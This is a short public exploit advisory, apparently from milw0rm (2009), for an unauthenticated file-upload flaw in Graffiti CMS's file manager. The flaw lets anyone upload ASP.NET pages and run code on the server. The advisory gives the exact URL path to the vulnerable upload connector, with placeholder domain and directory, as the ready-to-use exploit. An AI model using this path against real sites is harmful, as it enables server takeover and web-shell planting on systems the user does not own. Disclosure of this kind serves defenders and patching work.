10 lines
467 B
Text
Executable file
10 lines
467 B
Text
Executable file
Graffiti CMS includes a file manager component that allows
|
|
unauthenticated users to upload files (including asp.net pages which
|
|
allow code execution). All versions are affected by this
|
|
vulnerability.
|
|
|
|
To exploit this issue, it only suffices to access to the following URL.
|
|
|
|
http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx
|
|
|
|
# milw0rm.com [2009-09-10]
|